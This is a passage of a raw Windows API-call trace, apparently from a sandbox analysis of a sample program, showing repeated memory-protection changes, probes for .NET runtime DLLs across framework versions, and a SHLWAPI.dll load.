ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600a4, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.832] GetCurrentProcess () returned 0xffffffff [0059.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600a4, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.832] GetCurrentProcess () returned 0xffffffff [0059.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600a8, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.832] GetCurrentProcess () returned 0xffffffff [0059.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600a8, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.832] GetCurrentProcess () returned 0xffffffff [0059.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600ac, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.833] GetCurrentProcess () returned 0xffffffff [0059.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600ac, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.833] GetCurrentProcess () returned 0xffffffff [0059.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600b4, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.833] GetCurrentProcess () returned 0xffffffff [0059.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600b4, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.833] GetCurrentProcess () returned 0xffffffff [0059.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600c0, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.833] GetCurrentProcess () returned 0xffffffff [0059.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755600c0, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.834] GetCurrentProcess () returned 0xffffffff [0059.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560104, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.834] GetCurrentProcess () returned 0xffffffff [0059.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560104, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.834] GetCurrentProcess () returned 0xffffffff [0059.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560150, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.834] GetCurrentProcess () returned 0xffffffff [0059.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x75560150, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.834] GetCurrentProcess () returned 0xffffffff [0059.834] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x7556016c, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.835] GetCurrentProcess () returned 0xffffffff [0059.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x7556016c, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.835] GetCurrentProcess () returned 0xffffffff [0059.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755601b4, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x4, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x2) returned 0x0 [0059.835] GetCurrentProcess () returned 0xffffffff [0059.835] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f35c*=0x755601b4, NumberOfBytesToProtect=0x41f360, NewAccessProtection=0x2, OldAccessProtection=0x41f394 | out: BaseAddress=0x41f35c*=0x75560000, NumberOfBytesToProtect=0x41f360, OldAccessProtection=0x41f394*=0x4) returned 0x0 [0059.839] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0059.843] GetLastError () returned 0x2 [0059.843] SysReAllocStringLen (in: pbstr=0x41ec4c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", len=0x35 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll") returned 1 [0059.843] GetThreadLocale () returned 0x409 [0059.843] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.843] GetThreadLocale () returned 0x409 [0059.843] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", nBufferLength=0x104, lpBuffer=0x41e9d0, lpFilePart=0x41e9cc | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", lpFilePart=0x41e9cc*="clr.dll") returned 0x34 [0059.843] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll") returned 1 [0059.843] SysReAllocStringLen (in: pbstr=0x41ebfc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x41ebfc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll") returned 1 [0059.843] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", cchLength=0x34 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll") returned 0x34 [0059.843] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x41ec4c*="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll") returned 1 [0059.843] SetLastError (dwErrCode=0x2) [0059.843] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0059.844] GetLastError () returned 0x2 [0059.844] SysReAllocStringLen (in: pbstr=0x41ec4c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", len=0x3a | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll") returned 1 [0059.844] GetThreadLocale () returned 0x409 [0059.844] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.844] GetThreadLocale () returned 0x409 [0059.844] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x41e9d0, lpFilePart=0x41e9cc | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", lpFilePart=0x41e9cc*="mscorwks.dll") returned 0x39 [0059.845] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll") returned 1 [0059.845] SysReAllocStringLen (in: pbstr=0x41ebfc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x41ebfc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll") returned 1 [0059.845] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", cchLength=0x39 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll") returned 0x39 [0059.845] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x41ec4c*="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll") returned 1 [0059.845] SetLastError (dwErrCode=0x2) [0059.845] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0059.846] GetLastError () returned 0x2 [0059.846] SysReAllocStringLen (in: pbstr=0x41ec4c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", len=0x35 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll") returned 1 [0059.846] GetThreadLocale () returned 0x409 [0059.846] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.846] GetThreadLocale () returned 0x409 [0059.846] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", nBufferLength=0x104, lpBuffer=0x41e9d0, lpFilePart=0x41e9cc | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", lpFilePart=0x41e9cc*="clr.dll") returned 0x34 [0059.846] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll") returned 1 [0059.846] SysReAllocStringLen (in: pbstr=0x41ebfc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x41ebfc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll") returned 1 [0059.846] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", cchLength=0x34 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll") returned 0x34 [0059.846] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x41ec4c*="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll") returned 1 [0059.846] SetLastError (dwErrCode=0x2) [0059.846] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0059.846] GetLastError () returned 0x2 [0059.847] SysReAllocStringLen (in: pbstr=0x41ec4c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", len=0x3a | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll") returned 1 [0059.847] GetThreadLocale () returned 0x409 [0059.847] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.847] GetThreadLocale () returned 0x409 [0059.847] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x41e9d0, lpFilePart=0x41e9cc | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", lpFilePart=0x41e9cc*="mscorwks.dll") returned 0x39 [0059.847] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll") returned 1 [0059.847] SysReAllocStringLen (in: pbstr=0x41ebfc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x41ebfc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll") returned 1 [0059.847] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", cchLength=0x39 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll") returned 0x39 [0059.847] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x41ec4c*="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll") returned 1 [0059.847] SetLastError (dwErrCode=0x2) [0059.847] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0059.848] GetLastError () returned 0x2 [0059.848] SysReAllocStringLen (in: pbstr=0x41ec4c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", len=0x36 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll") returned 1 [0059.848] GetThreadLocale () returned 0x409 [0059.848] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.848] GetThreadLocale () returned 0x409 [0059.848] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", nBufferLength=0x104, lpBuffer=0x41e9d0, lpFilePart=0x41e9cc | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", lpFilePart=0x41e9cc*="clr.dll") returned 0x35 [0059.848] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll") returned 1 [0059.848] SysReAllocStringLen (in: pbstr=0x41ebfc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x41ebfc*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll") returned 1 [0059.848] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll") returned 0x35 [0059.848] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x41ec4c*="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll") returned 1 [0059.848] SetLastError (dwErrCode=0x2) [0059.848] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x11c [0059.849] GetLastError () returned 0x0 [0059.849] SysReAllocStringLen (in: pbstr=0x41ec4c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", len=0x3b | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll") returned 1 [0059.849] GetThreadLocale () returned 0x409 [0059.849] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.849] GetThreadLocale () returned 0x409 [0059.849] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x41e9d0, lpFilePart=0x41e9cc | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", lpFilePart=0x41e9cc*="mscorwks.dll") returned 0x3a [0059.849] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll") returned 1 [0059.849] SysReAllocStringLen (in: pbstr=0x41ebfc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x41ebfc*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll") returned 1 [0059.849] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", cchLength=0x3a | out: lpsz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") returned 0x3a [0059.850] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x41ec4c*="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") returned 1 [0059.850] SetLastError (dwErrCode=0x0) [0059.850] GetCurrentThreadId () returned 0xba4 [0059.850] ResetEvent (hEvent=0xb8) returned 1 [0059.850] GetCurrentThreadId () returned 0xba4 [0059.850] GetCurrentThreadId () returned 0xba4 [0059.850] GetCurrentThreadId () returned 0xba4 [0059.850] ResetEvent (hEvent=0xb8) returned 1 [0059.850] GetCurrentThreadId () returned 0xba4 [0059.850] GetCurrentThreadId () returned 0xba4 [0059.850] SetEvent (hEvent=0xbc) returned 1 [0059.850] SetEvent (hEvent=0xb8) returned 1 [0059.850] CloseHandle (hObject=0x11c) returned 1 [0059.851] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x11c [0059.852] GetLastError () returned 0x0 [0059.852] SysReAllocStringLen (in: pbstr=0x41ec4c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", len=0x36 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll") returned 1 [0059.852] GetThreadLocale () returned 0x409 [0059.852] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.852] GetThreadLocale () returned 0x409 [0059.852] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", nBufferLength=0x104, lpBuffer=0x41e9d0, lpFilePart=0x41e9cc | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpFilePart=0x41e9cc*="clr.dll") returned 0x35 [0059.852] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0059.852] SysReAllocStringLen (in: pbstr=0x41ebfc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x41ebfc*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0059.852] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 0x35 [0059.852] SysReAllocStringLen (in: pbstr=0x41ec4c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x41ec4c*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 1 [0059.852] SetLastError (dwErrCode=0x0) [0059.852] GetCurrentThreadId () returned 0xba4 [0059.852] ResetEvent (hEvent=0xb8) returned 1 [0059.852] GetCurrentThreadId () returned 0xba4 [0059.852] GetCurrentThreadId () returned 0xba4 [0059.852] GetCurrentThreadId () returned 0xba4 [0059.852] GetCurrentThreadId () returned 0xba4 [0059.852] ResetEvent (hEvent=0xb8) returned 1 [0059.853] GetCurrentThreadId () returned 0xba4 [0059.853] GetCurrentThreadId () returned 0xba4 [0059.853] SetEvent (hEvent=0xbc) returned 1 [0059.853] SetEvent (hEvent=0xb8) returned 1 [0059.853] CloseHandle (hObject=0x11c) returned 1 [0059.854] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21c50, cbMultiByte=11, lpWideCharStr=0x41dc0c, cchWideChar=2047 | out: lpWideCharStr="SHLWAPI.dllAൢ矈") returned 11 [0059.854] SysReAllocStringLen (in: pbstr=0x41ec10*=0x0, psz="SHLWAPI.dll", len=0xb | out: pbstr=0x41ec10*="SHLWAPI.dll") returned 1 [0059.854] CharLowerBuffW (in: lpsz="SHLWAPI.dll", cchLength=0xb | out: lpsz="shlwapi.dll") returned 0xb [0059.854] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0059.854] GetLastError () returned 0x0 [0059.855] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f1014, 